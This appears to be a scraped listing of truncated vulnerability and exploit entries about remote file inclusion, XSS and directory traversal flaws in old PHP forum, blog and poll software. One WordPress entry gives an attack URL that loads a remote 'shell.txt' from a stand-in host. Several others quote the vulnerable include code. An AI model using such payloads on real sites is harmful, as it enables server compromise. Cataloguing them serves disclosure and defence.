Cross site scripting
Cross-site scripting (XSS) vulnerability in the wp_explain_nonce function in the nonce AYS functionality (wp-includes/functions.php) for WordPress 2.0 before 2.0.9 and 2.1 before 2.1.1 allows remote attackers to inject arbitrary web script or HTML via the file parameter to wp-admin/templates.php, and...
CVE-2007-0762
PHP remote file inclusion vulnerability in includes/functions.php in phpBB++ Build 100 allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter...
phpBB++ Build 100 (phpbb_root_path) Remote File Include Exploit
No description provided by source. C xoron Name: phpBB++ phpbb_root_path Remote File Include Exploit Author: xoron Exploit coded by xoron Download: http://sourceforge.net/project/showfiles.php?groupid=86688&packageid=90098 xoron.biz - xoron.info Thanx: str0ke, kacper, k1tk4t, SHiKA, can bjorn...
Omegaboard <= 1.0beta4 (functions.php) Remote File Include Vuln
No description provided by source. Omegaboard v1.0b4 phpbb_root_path Remote File Include Exploit. Author: xoron, xoron.biz - xoron.info. Code: include_once...
phpBB++ Build 100 - 'phpbb_root_path' Remote File Inclusion
C xoron Name: phpBB++ phpbb_root_path Remote File Include Exploit Author: xoron Exploit coded by xoron Download: http://sourceforge.net/project/showfiles.php?groupid=86688&packageid=90098 xoron.biz - xoron.info Thanx: str0ke, kacper, k1tk4t, SHiKA, can bjorn Thanks: chaos, pang0, DJR POC:...
phpBB2 MODificat <= 0.2.0 (functions.php) Remote Include Vulnerability
No description provided by source. phpBB2 MODificat phpbb_root_path Remote File Include Exploit. Author: xoron, xoron.biz. Code: include_once $phpbb_root_path...
phpbb2-rfi.txt
phpBB2 MODificat phpbb_root_path Remote File Include Exploit. Author: xoron, xoron.biz. Code: include_once $phpbb_root_path...
Omegaboard 1.0beta4 - 'functions.php' Remote File Inclusion
Omegaboard v1.0b4 phpbb_root_path Remote File Include Exploit. Author: xoron, xoron.biz - xoron.info. Code: include_once $phpbb_root_path...
phpBB2 MODificat <= 0.2.0 (functions.php) Remote Include Vulnerability
Exploit for unknown platform in category web applications. phpBB2 MODificat <= 0.2.0 (functions.php) Remote Include Vulnerability...
PHPBB2 MODificat 0.2.0 - 'functions.php' Remote File Inclusion
phpBB2 MODificat phpbb_root_path Remote File Include Exploit. Author: xoron, xoron.biz. Code: include_once $phpbb_root_path...
EclipseBB 0.5.0 Lite (phpbb_root_path) Remote File Include Exploit
Exploit for unknown platform in category web applications. EclipseBB 0.5.0 Lite (phpbb_root_path) Remote File Include Exploit. C xoron Bug name: EclipseBB 0.5.0 Lite...
LunarPoll 1.0 (show.php PollDir) Remote File Include Vulnerability
Exploit for unknown platform in category web applications. LunarPoll 1.0 (show.php PollDir) Remote File Include Vulnerability. AYYILDIZ.ORG PreSents... Script:LunarPol...
CVE-2006-6808
Cross-site scripting (XSS) vulnerability in wp-admin/templates.php in WordPress 2.0.5 allows remote attackers to inject arbitrary web script or HTML via the file parameter. NOTE: some sources have reported this as a vulnerability in the get_file_description function in wp-admin/admin-functions.php...
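PHPMyProfiler Functions.PHP Remote File Inclusion Vulnerability
PHPMyProfiler is a PHP-based web application. PHPMyProfiler does not properly filter user-supplied URI data, so a remote attacker can exploit the vulnerability to execute arbitrary commands with the privileges of the web process. The problem is that the 'Functions.PHP' script does not filter the user-supplied 'pmprelpath' parameter; supplying a malicious remote server as the include target can lead to execution of arbitrary PHP code with the privileges of the web process. Affected: phpMyProfiler 0.9.6. No detailed solution is currently available; watch the following link: http://www.phpmyprofiler.de/...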
CVE-2006-6068
The CVE-2006-6068 entry concerns a directory traversal in the mAlbum 0.3 and earlier release. The vulnerability occurs in the cached_album function in functions.php, where user input passed via the gal parameter to index.php can be traversed using dot-dot sequences to list filenames of arbitrary ...
wordpress-rfi.txt
WordPress Remote File Inclusion. Download: http://wordpress.org/latest.zip Found by ANtrAX, http://foro.c-group.org Vulnerable Code: global $posts, $post, $wp_did_header, $wp_did_template_redirect, $wp_query, $wp_rewrite, $wpdb; extract($wp_query->query_vars); require_once($file); ..... Affected File:...
Wordpress File Inclusion
WordPress Remote File Inclusion. Download: http://wordpress.org/latest.zip Found by ANtrAX, http://foro.c-group.org Vulnerable Code: global $posts, $post, $wp_did_header, $wp_did_template_redirect, $wp_query, $wp_rewrite, $wpdb; extract($wp_query->query_vars); require_once($file); ..... Affected File:...
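WordPress Functions.PHP Remote File Inclusion Vulnerability
Because it does not sufficiently filter user-supplied data. An attacker can exploit this issue to compromise the application and the underlying system; other attacks are also possible. WordPress version 2.0.5 is vulnerable. WordPress WordPress 2.0.5 http://www.example.com/wp-includes/functions.php?file=http://www.example2.com/shell.txt?...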
CVE-2006-5520
PHP remote file inclusion vulnerability in functions.php in DeltaScripts PHP Classifieds 7.1 allows remote attackers to execute arbitrary PHP code via a URL in the setpath parameter...